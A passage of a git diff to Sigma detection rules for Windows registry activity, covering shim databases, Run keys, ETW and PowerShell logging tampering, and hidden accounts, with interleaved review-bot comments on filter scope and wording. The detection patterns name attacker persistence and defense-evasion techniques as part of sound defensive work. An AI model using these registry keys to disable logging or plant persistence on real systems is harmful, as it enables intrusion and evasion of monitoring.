diff --git a/sigma/builtin/registry/registry_set/registry_set_persistence_shim_database.yml b/sigma/builtin/registry/registry_set/registry_set_persistence_shim_database.yml index b8fae6e0f..3378e8b38 100644 --- a/sigma/builtin/registry/registry_set/registry_set_persistence_shim_database.yml +++ b/sigma/builtin/registry/registry_set/registry_set_persistence_shim_database.yml @@ -1,14 +1,9 @@ title: Potential Persistence Via Shim Database Modification id: dfb5b4e8-91d0-4291-b40a-e3b0d3942c45 status: experimental -description: 'Adversaries may establish persistence and/or elevate privileges by executing - malicious content triggered by application shims. - - The Microsoft Windows Application Compatibility Infrastructure/Framework (Application - Shim) was created to allow for backward compatibility of software as the operating - system codebase changes over time - - ' +description: | + Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims. + The Microsoft Windows Application Compatibility Infrastructure/Framework (Application Shim) was created to allow for backward compatibility of software as the operating system codebase changes over time references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.011/T1546.011.md#atomic-test-3---registry-key-creation-andor-modification-events-for-sdb - https://www.fireeye.com/blog/threat-research/2017/05/fin7-shim-databases-persistence.html diff --git a/sigma/builtin/registry/registry_set/registry_set_persistence_shim_database_susp_application.yml b/sigma/builtin/registry/registry_set/registry_set_persistence_shim_database_susp_application.yml index 9d5f62be0..ec639616f 100644 --- a/sigma/builtin/registry/registry_set/registry_set_persistence_shim_database_susp_application.yml +++ b/sigma/builtin/registry/registry_set/registry_set_persistence_shim_database_susp_application.yml 
@@ -1,8 +1,7 @@ title: Suspicious Shim Database Patching Activity id: bf344fea-d947-4ef4-9192-34d008315d3a status: experimental -description: Detects installation of new shim databases that try to patch sections - of known processes for potential process injection or persistence. +description: Detects installation of new shim databases that try to patch sections of known processes for potential process injection or persistence. references: - https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/pillowmint-fin7s-monkey-thief/ - https://www.fireeye.com/blog/threat-research/2017/05/fin7-shim-databases-persistence.html diff --git a/sigma/builtin/registry/registry_set/registry_set_persistence_shim_database_uncommon_location.yml b/sigma/builtin/registry/registry_set/registry_set_persistence_shim_database_uncommon_location.yml index 09ef27c25..7456f8f60 100644 --- a/sigma/builtin/registry/registry_set/registry_set_persistence_shim_database_uncommon_location.yml +++ b/sigma/builtin/registry/registry_set/registry_set_persistence_shim_database_uncommon_location.yml @@ -1,8 +1,7 @@ title: Potential Persistence Via Shim Database In Uncommon Location id: 6b6976a3-b0e6-4723-ac24-ae38a737af41 status: experimental -description: Detects the installation of a new shim database where the file is located - in a non-default location +description: Detects the installation of a new shim database where the file is located in a non-default location references: - https://www.fireeye.com/blog/threat-research/2017/05/fin7-shim-databases-persistence.html - https://andreafortuna.org/2018/11/12/process-injection-and-persistence-using-application-shimming/ diff --git a/sigma/builtin/registry/registry_set/registry_set_persistence_typed_paths.yml b/sigma/builtin/registry/registry_set/registry_set_persistence_typed_paths.yml index 611354f25..025dc306a 100644 --- a/sigma/builtin/registry/registry_set/registry_set_persistence_typed_paths.yml 
+++ b/sigma/builtin/registry/registry_set/registry_set_persistence_typed_paths.yml @@ -1,9 +1,7 @@ title: Potential Persistence Via TypedPaths id: 086ae989-9ca6-4fe7-895a-759c5544f247 status: experimental -description: Detects modification addition to the 'TypedPaths' key in the user or - admin registry from a non standard application. Which might indicate persistence - attempt +description: Detects modification addition to the 'TypedPaths' key in the user or admin registry from a non standard application. Which might indicate persistence attempt references: - https://twitter.com/dez_/status/1560101453150257154 - https://forensafe.com/blogs/typedpaths.html diff --git a/sigma/builtin/registry/registry_set/registry_set_persistence_xll.yml b/sigma/builtin/registry/registry_set/registry_set_persistence_xll.yml index 4974febf9..58261c6f0 100644 --- a/sigma/builtin/registry/registry_set/registry_set_persistence_xll.yml +++ b/sigma/builtin/registry/registry_set/registry_set_persistence_xll.yml @@ -1,8 +1,7 @@ title: Potential Persistence Via Excel Add-in - Registry id: 961e33d1-4f86-4fcf-80ab-930a708b2f82 status: experimental -description: Detect potential persistence via the creation of an excel add-in (XLL) - file to make it run automatically when Excel is started. +description: Detect potential persistence via the creation of an excel add-in (XLL) file to make it run automatically when Excel is started. references: - https://github.com/redcanaryco/atomic-red-team/blob/4ae9580a1a8772db87a1b6cdb0d03e5af231e966/atomics/T1137.006/T1137.006.md - https://labs.withsecure.com/publications/add-in-opportunities-for-office-persistence diff --git a/sigma/builtin/registry/registry_set/registry_set_policies_associations_tamper.yml b/sigma/builtin/registry/registry_set/registry_set_policies_associations_tamper.yml index 63d1906e5..d2b9a2323 100644 --- a/sigma/builtin/registry/registry_set/registry_set_policies_associations_tamper.yml 
+++ b/sigma/builtin/registry/registry_set/registry_set_policies_associations_tamper.yml @@ -1,8 +1,7 @@ title: Potential Attachment Manager Settings Associations Tamper id: a9b6c011-ab69-4ddb-bc0a-c4f21c80ec47 status: experimental -description: Detects tampering with attachment manager settings policies associations - to lower the default file type risks (See reference for more information) +description: Detects tampering with attachment manager settings policies associations to lower the default file type risks (See reference for more information) references: - https://support.microsoft.com/en-us/topic/information-about-the-attachment-manager-in-microsoft-windows-c48a4dcd-8de5-2af5-ee9b-cd795ae42738 - https://www.virustotal.com/gui/file/2bcd5702a7565952c44075ac6fb946c7780526640d1264f692c7664c02c68465 @@ -25,7 +24,7 @@ detection: NewValue: DWORD (0x00006152) selection_value_low_risk_filetypes: ObjectName|endswith: \LowRiskFileTypes - NewValue|contains: + NewValue|contains: # Add more as you see fit - .zip; - .rar; - .exe; diff --git a/sigma/builtin/registry/registry_set/registry_set_policies_attachments_tamper.yml b/sigma/builtin/registry/registry_set/registry_set_policies_attachments_tamper.yml index 0c1dfc308..202c6b17c 100644 --- a/sigma/builtin/registry/registry_set/registry_set_policies_attachments_tamper.yml +++ b/sigma/builtin/registry/registry_set/registry_set_policies_attachments_tamper.yml 
@@ -1,8 +1,7 @@ title: Potential Attachment Manager Settings Attachments Tamper id: ee77a5db-b0f3-4be2-bfd4-b58be1c6b15a status: experimental -description: Detects tampering with attachment manager settings policies attachments - (See reference for more information) +description: Detects tampering with attachment manager settings policies attachments (See reference for more information) references: - https://support.microsoft.com/en-us/topic/information-about-the-attachment-manager-in-microsoft-windows-c48a4dcd-8de5-2af5-ee9b-cd795ae42738 - https://www.virustotal.com/gui/file/2bcd5702a7565952c44075ac6fb946c7780526640d1264f692c7664c02c68465 diff --git a/sigma/builtin/registry/registry_set/registry_set_powershell_enablescripts_enabled.yml b/sigma/builtin/registry/registry_set/registry_set_powershell_enablescripts_enabled.yml index 963cda87b..870840ed1 100644 --- a/sigma/builtin/registry/registry_set/registry_set_powershell_enablescripts_enabled.yml +++ b/sigma/builtin/registry/registry_set/registry_set_powershell_enablescripts_enabled.yml @@ -1,11 +1,10 @@ title: PowerShell Script Execution Policy Enabled id: 8218c875-90b9-42e2-b60d-0b0069816d10 related: - - id: fad91067-08c5-4d1a-8d8c-d96a21b37814 - type: derived + - id: fad91067-08c5-4d1a-8d8c-d96a21b37814 + type: derived status: experimental -description: Detects the enabling of the PowerShell script execution policy. Once - enabled, this policy allows scripts to be executed. +description: Detects the enabling of the PowerShell script execution policy. Once enabled, this policy allows scripts to be executed. references: - https://admx.help/?Category=Windows_10_2016&Policy=Microsoft.Policies.PowerShell::EnableScripts author: Nasreddine Bencherchali (Nextron Systems), Thurein Oo diff --git a/sigma/builtin/registry/registry_set/registry_set_powershell_execution_policy.yml b/sigma/builtin/registry/registry_set/registry_set_powershell_execution_policy.yml index 6188e4002..c1e296e42 100644 
--- a/sigma/builtin/registry/registry_set/registry_set_powershell_execution_policy.yml +++ b/sigma/builtin/registry/registry_set/registry_set_powershell_execution_policy.yml @@ -1,15 +1,14 @@ title: Potential PowerShell Execution Policy Tampering id: fad91067-08c5-4d1a-8d8c-d96a21b37814 related: - - id: cf2e938e-9a3e-4fe8-a347-411642b28a9f - type: similar - - id: 87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180 - type: similar - - id: 61d0475c-173f-4844-86f7-f3eebae1c66b - type: similar + - id: cf2e938e-9a3e-4fe8-a347-411642b28a9f # Registry + type: similar + - id: 87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180 # ProcCreation Cmdlet + type: similar + - id: 61d0475c-173f-4844-86f7-f3eebae1c66b # PowerShell ScriptBlock + type: similar status: experimental -description: Detects changes to the PowerShell execution policy in order to bypass - signing requirements for script execution +description: Detects changes to the PowerShell execution policy in order to bypass signing requirements for script execution references: - https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.security/set-executionpolicy?view=powershell-7.3 author: Nasreddine Bencherchali (Nextron Systems) @@ -32,6 +31,7 @@ detection: - Bypass - Unrestricted filter_main_svchost: + # Note: We filter out "svchost" to avoid FP with changes using "gpedit" for example. ProcessName|contains: - :\Windows\System32\ - :\Windows\SysWOW64\ diff --git a/sigma/builtin/registry/registry_set/registry_set_powershell_logging_disabled.yml b/sigma/builtin/registry/registry_set/registry_set_powershell_logging_disabled.yml index 83a165593..dc0490b1a 100644 --- a/sigma/builtin/registry/registry_set/registry_set_powershell_logging_disabled.yml +++ b/sigma/builtin/registry/registry_set/registry_set_powershell_logging_disabled.yml 
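Review bot: The new comment on `filter_main_svchost` says the filter removes "svchost", but the two `ProcessName|contains` entries visible in the hunk (`:\Windows\System32\`, `:\Windows\SysWOW64\`) match every binary in those directories, including reg.exe and powershell.exe, which are the usual writers of the ExecutionPolicy value. If the filter map continues outside the hunk with something like `ProcessName|endswith: \svchost.exe`, the comment is accurate and only the wording could say so; if it does not, the exclusion is far broader than the comment claims and should be narrowed to that `endswith` form. The filter definition runs past the end of this hunk, so the full map cannot be confirmed here.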
@@ -1,9 +1,7 @@ title: PowerShell Logging Disabled Via Registry Key Tampering id: fecfd1a1-cc78-4313-a1ea-2ee2e8ec27a7 status: experimental -description: Detects changes to the registry for the currently logged-in user. In - order to disable PowerShell module logging, script block logging or transcription - and script execution logging +description: Detects changes to the registry for the currently logged-in user. In order to disable PowerShell module logging, script block logging or transcription and script execution logging references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1112/T1112.md#atomic-test-32---windows-powershell-logging-disabled author: frack113 diff --git a/sigma/builtin/registry/registry_set/registry_set_provisioning_command_abuse.yml b/sigma/builtin/registry/registry_set/registry_set_provisioning_command_abuse.yml index c120d95dd..42f0fa3fe 100644 --- a/sigma/builtin/registry/registry_set/registry_set_provisioning_command_abuse.yml +++ b/sigma/builtin/registry/registry_set/registry_set_provisioning_command_abuse.yml 
@@ -1,15 +1,14 @@ title: Potential Provisioning Registry Key Abuse For Binary Proxy Execution - REG id: 7021255e-5db3-4946-a8b9-0ba7a4644a69 related: - - id: 7f5d1c9a-3e83-48df-95a7-2b98aae6c13c - type: similar - - id: f9999590-1f94-4a34-a91e-951e47bedefd - type: similar - - id: 2a4b3e61-9d22-4e4a-b60f-6e8f0cde6f25 - type: similar + - id: 7f5d1c9a-3e83-48df-95a7-2b98aae6c13c # CLI Generic + type: similar + - id: f9999590-1f94-4a34-a91e-951e47bedefd # CLI Abuse + type: similar + - id: 2a4b3e61-9d22-4e4a-b60f-6e8f0cde6f25 # CLI Registry + type: similar status: experimental -description: Detects potential abuse of the provisioning registry key for indirect - command execution through "Provlaunch.exe". +description: Detects potential abuse of the provisioning registry key for indirect command execution through "Provlaunch.exe". references: - https://lolbas-project.github.io/lolbas/Binaries/Provlaunch/ - https://twitter.com/0gtweet/status/1674399582162153472 @@ -22,8 +21,7 @@ tags: logsource: category: registry_set product: windows - definition: 'Requirements: The registry key "\SOFTWARE\Microsoft\Provisioning\Commands\" - and its subkey must be monitored' + definition: 'Requirements: The registry key "\SOFTWARE\Microsoft\Provisioning\Commands\" and its subkey must be monitored' detection: registry_set: EventID: 4657 diff --git a/sigma/builtin/registry/registry_set/registry_set_renamed_sysinternals_eula_accepted.yml b/sigma/builtin/registry/registry_set/registry_set_renamed_sysinternals_eula_accepted.yml index 2f7f9ec5b..dd1d34816 100644 --- a/sigma/builtin/registry/registry_set/registry_set_renamed_sysinternals_eula_accepted.yml +++ b/sigma/builtin/registry/registry_set/registry_set_renamed_sysinternals_eula_accepted.yml 
@@ -1,13 +1,12 @@ title: Usage of Renamed Sysinternals Tools - RegistrySet id: 8023f872-3f1d-4301-a384-801889917ab4 related: - - id: 25ffa65d-76d8-4da5-a832-3f2b0136e133 - type: derived - - id: f50f3c09-557d-492d-81db-9064a8d4e211 - type: similar + - id: 25ffa65d-76d8-4da5-a832-3f2b0136e133 + type: derived + - id: f50f3c09-557d-492d-81db-9064a8d4e211 + type: similar status: experimental -description: Detects non-sysinternals tools setting the "accepteula" key which normally - is set on sysinternals tool execution +description: Detects non-sysinternals tools setting the "accepteula" key which normally is set on sysinternals tool execution references: - Internal Research author: Nasreddine Bencherchali (Nextron Systems) @@ -53,9 +52,8 @@ detection: - \ADExplorer.exe - \ADExplorer64.exe filter_optional_null: - ProcessName: null - condition: registry_set and (selection and not 1 of filter_main_* and not 1 of - filter_optional_*) + ProcessName: + condition: registry_set and (selection and not 1 of filter_main_* and not 1 of filter_optional_*) falsepositives: - Unlikely level: high diff --git a/sigma/builtin/registry/registry_set/registry_set_rpcrt4_etw_tamper.yml b/sigma/builtin/registry/registry_set/registry_set_rpcrt4_etw_tamper.yml index db3fbf4d6..a73ec2a57 100644 --- a/sigma/builtin/registry/registry_set/registry_set_rpcrt4_etw_tamper.yml +++ b/sigma/builtin/registry/registry_set/registry_set_rpcrt4_etw_tamper.yml @@ -1,8 +1,7 @@ title: ETW Logging Disabled For rpcrt4.dll id: 90f342e1-1aaa-4e43-b092-39fda57ed11e status: experimental -description: Detects changes to the "ExtErrorInformation" key in order to disable - ETW logging for rpcrt4.dll +description: Detects changes to the "ExtErrorInformation" key in order to disable ETW logging for rpcrt4.dll references: - http://redplait.blogspot.com/2020/07/whats-wrong-with-etw.html author: Nasreddine Bencherchali (Nextron Systems) 
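Review bot: Replacing `ProcessName: null` with the bare key `ProcessName:` in `filter_optional_null` relies on YAML's implicit null and reads like an unfinished entry; behaviour is unchanged, but the explicit form states the intent that events without a process name are excluded. Keeping `ProcessName: null` (or adding `# match events with no ProcessName` above the key) makes the optional filter self-explanatory for whoever tunes it next.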
@@ -22,8 +21,9 @@ detection: selection: ObjectName|endswith: \Microsoft\Windows NT\Rpc\ExtErrorInformation NewValue: - - DWORD (0x00000000) - - DWORD (0x00000002) + # This is disabled by default for some reason + - DWORD (0x00000000) # Off + - DWORD (0x00000002) # Off with exceptions condition: registry_set and selection falsepositives: - Unknown diff --git a/sigma/builtin/registry/registry_set/registry_set_scr_file_executed_by_rundll32.yml b/sigma/builtin/registry/registry_set/registry_set_scr_file_executed_by_rundll32.yml index d1f9491ed..6086e1008 100644 --- a/sigma/builtin/registry/registry_set/registry_set_scr_file_executed_by_rundll32.yml +++ b/sigma/builtin/registry/registry_set/registry_set_scr_file_executed_by_rundll32.yml @@ -1,8 +1,7 @@ title: ScreenSaver Registry Key Set id: 40b6e656-4e11-4c0c-8772-c1cc6dae34ce status: experimental -description: Detects registry key established after masqueraded .scr file execution - using Rundll32 through desk.cpl +description: Detects registry key established after masqueraded .scr file execution using Rundll32 through desk.cpl references: - https://twitter.com/VakninHai/status/1517027824984547329 - https://twitter.com/pabraeken/status/998627081360695297 diff --git a/sigma/builtin/registry/registry_set/registry_set_servicedll_hijack.yml b/sigma/builtin/registry/registry_set/registry_set_servicedll_hijack.yml index a095f4222..d78d67175 100644 --- a/sigma/builtin/registry/registry_set/registry_set_servicedll_hijack.yml +++ b/sigma/builtin/registry/registry_set/registry_set_servicedll_hijack.yml 
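Review bot: The added comment `# This is disabled by default for some reason` does not tell a maintainer what that means for the detection: if 0 is the default state, the rule also fires when the default is simply re-applied, not only when extended error information is actively switched off. A comment that states the consequence is more useful, e.g. `# 0 is the default (off); writes that re-apply the default will also match, so correlate with the writing process`. The `# Off` / `# Off with exceptions` value comments are a good addition.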
@@ -1,8 +1,7 @@ title: ServiceDll Hijack id: 612e47e9-8a59-43a6-b404-f48683f45bd6 status: experimental -description: Detects changes to the "ServiceDLL" value related to a service in the - registry. This is often used as a method of persistence. +description: Detects changes to the "ServiceDLL" value related to a service in the registry. This is often used as a method of persistence. references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1543.003/T1543.003.md#atomic-test-4---tinyturla-backdoor-service-w64time - https://www.hexacorn.com/blog/2013/09/19/beyond-good-ol-run-key-part-4/ diff --git a/sigma/builtin/registry/registry_set/registry_set_services_etw_tamper.yml b/sigma/builtin/registry/registry_set/registry_set_services_etw_tamper.yml index 7f6a87edf..ffe3a9057 100644 --- a/sigma/builtin/registry/registry_set/registry_set_services_etw_tamper.yml +++ b/sigma/builtin/registry/registry_set/registry_set_services_etw_tamper.yml @@ -1,8 +1,7 @@ title: ETW Logging Disabled For SCM id: 4f281b83-0200-4b34-bf35-d24687ea57c2 status: experimental -description: Detects changes to the "TracingDisabled" key in order to disable ETW - logging for services.exe (SCM) +description: Detects changes to the "TracingDisabled" key in order to disable ETW logging for services.exe (SCM) references: - http://redplait.blogspot.com/2020/07/whats-wrong-with-etw.html author: Nasreddine Bencherchali (Nextron Systems) diff --git a/sigma/builtin/registry/registry_set/registry_set_set_nopolicies_user.yml b/sigma/builtin/registry/registry_set/registry_set_set_nopolicies_user.yml index 3e4e6341d..3a80690de 100644 --- a/sigma/builtin/registry/registry_set/registry_set_set_nopolicies_user.yml +++ b/sigma/builtin/registry/registry_set/registry_set_set_nopolicies_user.yml 
@@ -1,8 +1,7 @@ title: Registry Explorer Policy Modification id: 1c3121ed-041b-4d97-a075-07f54f20fb4a status: test -description: Detects registry modifications that disable internal tools or functions - in explorer (malware like Agent Tesla uses this technique) +description: Detects registry modifications that disable internal tools or functions in explorer (malware like Agent Tesla uses this technique) references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1112/T1112.md author: frack113 diff --git a/sigma/builtin/registry/registry_set/registry_set_sip_persistence.yml b/sigma/builtin/registry/registry_set/registry_set_sip_persistence.yml index 959b82438..7c2f6cfa2 100644 --- a/sigma/builtin/registry/registry_set/registry_set_sip_persistence.yml +++ b/sigma/builtin/registry/registry_set/registry_set_sip_persistence.yml @@ -1,8 +1,7 @@ title: Persistence Via New SIP Provider id: 5a2b21ee-6aaa-4234-ac9d-59a59edf90a1 status: experimental -description: Detects when an attacker register a new SIP provider for persistence - and defense evasion +description: Detects when an attacker register a new SIP provider for persistence and defense evasion references: - https://persistence-info.github.io/Data/codesigning.html - https://github.com/gtworek/PSBits/tree/master/SIP @@ -33,6 +32,7 @@ detection: - \$DLL filter: NewValue: + # Add more legitimate SIP providers according to your env - WINTRUST.DLL - mso.dll filter_poqexec: diff --git a/sigma/builtin/registry/registry_set/registry_set_sophos_av_tamper.yml b/sigma/builtin/registry/registry_set/registry_set_sophos_av_tamper.yml index 3da4555d7..82f724b00 100644 --- a/sigma/builtin/registry/registry_set/registry_set_sophos_av_tamper.yml +++ b/sigma/builtin/registry/registry_set/registry_set_sophos_av_tamper.yml 
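Review bot: The `filter` in the SIP persistence rule excludes by the bare value `WINTRUST.DLL` / `mso.dll`, so the new comment inviting users to add more providers should warn that the allow-list compares the registered DLL name only, with no path or signer context. A registration that names one of these DLLs but resolves it from an unexpected location would be filtered out as well, so the comment could read `# Add more legitimate SIP providers according to your env; note this matches the DLL name only, not its path`. The remainder of the filter block (`filter_poqexec`) lies outside the hunk.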
@@ -25,7 +25,6 @@ detection: NewValue: DWORD (0x00000000) condition: registry_set and selection falsepositives: - - Some FP may occur when the feature is disabled by the AV itself, you should - always investigate if the action was legitimate + - Some FP may occur when the feature is disabled by the AV itself, you should always investigate if the action was legitimate level: high ruletype: Sigma diff --git a/sigma/builtin/registry/registry_set/registry_set_special_accounts.yml b/sigma/builtin/registry/registry_set/registry_set_special_accounts.yml index f5f5c36f2..bfac91111 100644 --- a/sigma/builtin/registry/registry_set/registry_set_special_accounts.yml +++ b/sigma/builtin/registry/registry_set/registry_set_special_accounts.yml @@ -1,12 +1,10 @@ title: Hiding User Account Via SpecialAccounts Registry Key id: f8aebc67-a56d-4ec9-9fbe-7b0e8b7b4efd related: - - id: 8a58209c-7ae6-4027-afb0-307a78e4589a - type: obsoletes + - id: 8a58209c-7ae6-4027-afb0-307a78e4589a + type: obsoletes status: test -description: Detects modifications to the registry key "HKLM\Software\Microsoft\Windows - NT\CurrentVersion\Winlogon\SpecialAccounts\Userlist" where the value is set to - "0" in order to hide user account from being listed on the logon screen. +description: Detects modifications to the registry key "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\Userlist" where the value is set to "0" in order to hide user account from being listed on the logon screen. references: - https://thedfirreport.com/2022/07/11/select-xmrig-from-sqlserver/ - https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1564.002/T1564.002.md @@ -24,7 +22,7 @@ detection: EventID: 4657 Channel: Security selection: - OperationType: '%%1905' + OperationType: '%%1905' ObjectName|contains: \SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList NewValue: DWORD (0x00000000) condition: registry_set and selection 
diff --git a/sigma/builtin/registry/registry_set/registry_set_suppress_defender_notifications.yml b/sigma/builtin/registry/registry_set/registry_set_suppress_defender_notifications.yml index ff362b93f..9e428f046 100644 --- a/sigma/builtin/registry/registry_set/registry_set_suppress_defender_notifications.yml +++ b/sigma/builtin/registry/registry_set/registry_set_suppress_defender_notifications.yml @@ -1,8 +1,7 @@ title: Activate Suppression of Windows Security Center Notifications id: 0c93308a-3f1b-40a9-b649-57ea1a1c1d63 status: experimental -description: Detect set Notification_Suppress to 1 to disable the Windows security - center notification +description: Detect set Notification_Suppress to 1 to disable the Windows security center notification references: - https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1112/T1112.md author: frack113 diff --git a/sigma/builtin/registry/registry_set/registry_set_susp_keyboard_layout_load.yml b/sigma/builtin/registry/registry_set/registry_set_susp_keyboard_layout_load.yml index 106f02da6..00dda3eaa 100644 --- a/sigma/builtin/registry/registry_set/registry_set_susp_keyboard_layout_load.yml +++ b/sigma/builtin/registry/registry_set/registry_set_susp_keyboard_layout_load.yml @@ -1,9 +1,7 @@ title: Suspicious Keyboard Layout Load id: 34aa0252-6039-40ff-951f-939fd6ce47d8 status: test -description: Detects the keyboard preload installation with a suspicious keyboard - layout, e.g. Chinese, Iranian or Vietnamese layout load in user session on systems - maintained by US staff only +description: Detects the keyboard preload installation with a suspicious keyboard layout, e.g. Chinese, Iranian or Vietnamese layout load in user session on systems maintained by US staff only references: - https://renenyffenegger.ch/notes/Windows/registry/tree/HKEY_CURRENT_USER/Keyboard-Layout/Preload/index - https://github.com/SwiftOnSecurity/sysmon-config/pull/92/files 
@@ -16,8 +14,7 @@ tags: logsource: category: registry_set product: windows - definition: 'Requirements: Sysmon config that monitors \Keyboard Layout\Preload - subkey of the HKLU hives - see https://github.com/SwiftOnSecurity/sysmon-config/pull/92/files' + definition: 'Requirements: Sysmon config that monitors \Keyboard Layout\Preload subkey of the HKLU hives - see https://github.com/SwiftOnSecurity/sysmon-config/pull/92/files' detection: registry_set: EventID: 4657 @@ -27,12 +24,11 @@ detection: - \Keyboard Layout\Preload\ - \Keyboard Layout\Substitutes\ NewValue|contains: - - 00000429 - - 00050429 - - 0000042a + - 00000429 # Persian (Iran) + - 00050429 # Persian (Iran) + - 0000042a # Vietnamese condition: registry_set and selection_registry falsepositives: - - Administrators or users that actually use the selected keyboard layouts (heavily - depends on the organisation's user base) + - Administrators or users that actually use the selected keyboard layouts (heavily depends on the organisation's user base) level: medium ruletype: Sigma diff --git a/sigma/builtin/registry/registry_set/registry_set_susp_pendingfilerenameoperations.yml b/sigma/builtin/registry/registry_set/registry_set_susp_pendingfilerenameoperations.yml index b8ff80487..a871ce1eb 100644 --- a/sigma/builtin/registry/registry_set/registry_set_susp_pendingfilerenameoperations.yml +++ b/sigma/builtin/registry/registry_set/registry_set_susp_pendingfilerenameoperations.yml 
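Review bot: The joined `definition` still says the requirement is a "Sysmon config that monitors \Keyboard Layout\Preload", yet the detection below it keys on `EventID: 4657`, i.e. Security-channel object-access auditing, not Sysmon. The prerequisite a reader actually needs is a SACL on that key so 4657 events are generated; suggested wording: `definition: 'Requirements: Object access auditing (SACL) on the \Keyboard Layout\Preload subkey of the HKCU hives so that EventID 4657 is logged - see https://github.com/SwiftOnSecurity/sysmon-config/pull/92/files'`. The same Sysmon-vs-4657 mismatch is in the `definition` line of the telemetry persistence rule's second hunk further down.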
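Review bot: The new value comments (`# Persian (Iran)`, `# Vietnamese`) make visible that the selection contains no Chinese layout, while the description in this file's first hunk still advertises "Chinese, Iranian or Vietnamese". Either the description should drop "Chinese" or the selection should be extended; as committed, an analyst reading the description expects coverage the rule does not provide. A one-line comment such as `# Chinese layouts are not included; extend per your user base` above the list would at least make the gap explicit.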
@@ -1,9 +1,7 @@ title: Potential PendingFileRenameOperations Tamper id: 4eec988f-7bf0-49f1-8675-1e6a510b3a2a status: test -description: Detect changes to the "PendingFileRenameOperations" registry key from - uncommon or suspicious images lcoations to stage currently used files for rename - after reboot. +description: Detect changes to the "PendingFileRenameOperations" registry key from uncommon or suspicious images lcoations to stage currently used files for rename after reboot. references: - https://any.run/report/3ecd4763ffc944fdc67a9027e459cd4f448b1a8d1b36147977afaf86bbf2a261/64b0ba45-e7ce-423b-9a1d-5b4ea59521e6 - https://devblogs.microsoft.com/scripting/determine-pending-reboot-statuspowershell-style-part-1/ @@ -23,7 +21,7 @@ detection: EventID: 4657 Channel: Security selection_main: - OperationType: '%%1905' + OperationType: '%%1905' ObjectName|contains: \CurrentControlSet\Control\Session Manager\PendingFileRenameOperations selection_susp_paths: ProcessName|contains: diff --git a/sigma/builtin/registry/registry_set/registry_set_susp_printer_driver.yml b/sigma/builtin/registry/registry_set/registry_set_susp_printer_driver.yml index b97ce62f5..45c2e0ae6 100644 --- a/sigma/builtin/registry/registry_set/registry_set_susp_printer_driver.yml +++ b/sigma/builtin/registry/registry_set/registry_set_susp_printer_driver.yml @@ -1,8 +1,7 @@ title: Suspicious Printer Driver Empty Manufacturer id: e0813366-0407-449a-9869-a2db1119dc41 status: test -description: Detects a suspicious printer driver installation with an empty Manufacturer - value +description: Detects a suspicious printer driver installation with an empty Manufacturer value references: - https://twitter.com/SBousseaden/status/1410545674773467140 author: Florian Roth (Nextron Systems) 
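Review bot: The re-joined description keeps the typo "images lcoations"; the line should read `description: Detect changes to the "PendingFileRenameOperations" registry key from uncommon or suspicious image locations to stage currently used files for rename after reboot.` Since the commit rewrites the whole line anyway, fixing the wording here avoids carrying the error into every downstream export.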
@@ -34,7 +33,6 @@ detection: ObjectName|contains: \Version-3\PDF24\ condition: registry_set and (selection and not 1 of filter_*) falsepositives: - - Alerts on legitimate printer drivers that do not set any more details in the - Manufacturer value + - Alerts on legitimate printer drivers that do not set any more details in the Manufacturer value level: high ruletype: Sigma diff --git a/sigma/builtin/registry/registry_set/registry_set_susp_reg_persist_explorer_run.yml b/sigma/builtin/registry/registry_set/registry_set_susp_reg_persist_explorer_run.yml index 5fb754e1d..4a74b2801 100644 --- a/sigma/builtin/registry/registry_set/registry_set_susp_reg_persist_explorer_run.yml +++ b/sigma/builtin/registry/registry_set/registry_set_susp_reg_persist_explorer_run.yml @@ -1,8 +1,7 @@ title: Registry Persistence via Explorer Run Key id: b7916c2a-fa2f-4795-9477-32b731f70f11 status: test -description: Detects a possible persistence mechanism using RUN key for Windows Explorer - and pointing to a suspicious folder +description: Detects a possible persistence mechanism using RUN key for Windows Explorer and pointing to a suspicious folder references: - https://researchcenter.paloaltonetworks.com/2018/07/unit42-upatre-continues-evolve-new-anti-analysis-techniques/ author: Florian Roth (Nextron Systems), oscd.community diff --git a/sigma/builtin/registry/registry_set/registry_set_susp_run_key_img_folder.yml b/sigma/builtin/registry/registry_set/registry_set_susp_run_key_img_folder.yml index 48555c5d2..aa78bd7fb 100644 --- a/sigma/builtin/registry/registry_set/registry_set_susp_run_key_img_folder.yml +++ b/sigma/builtin/registry/registry_set/registry_set_susp_run_key_img_folder.yml 
@@ -1,8 +1,7 @@ title: New RUN Key Pointing to Suspicious Folder id: 02ee49e2-e294-4d0f-9278-f5b3212fc588 status: experimental -description: Detects suspicious new RUN key element pointing to an executable in a - suspicious folder +description: Detects suspicious new RUN key element pointing to an executable in a suspicious folder references: - https://www.fireeye.com/blog/threat-research/2018/08/fin7-pursuing-an-enigmatic-and-evasive-global-criminal-operation.html author: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing @@ -23,20 +22,20 @@ detection: - \SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ - \SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\ selection_details: - - NewValue|contains: - - :\$Recycle.bin\ - - :\Temp\ - - :\Users\Default\ - - :\Users\Desktop\ - - :\Users\Public\ - - :\Windows\Temp\ - - \AppData\Local\Temp\ - - '%temp%\' - - '%tmp%\' - - NewValue|startswith: - - '%Public%\' - - wscript - - cscript + - NewValue|contains: + - :\$Recycle.bin\ + - :\Temp\ + - :\Users\Default\ + - :\Users\Desktop\ + - :\Users\Public\ + - :\Windows\Temp\ + - \AppData\Local\Temp\ + - '%temp%\' + - '%tmp%\' + - NewValue|startswith: + - '%Public%\' + - wscript + - cscript condition: registry_set and (all of selection_*) fields: - ProcessName diff --git a/sigma/builtin/registry/registry_set/registry_set_susp_service_installed.yml 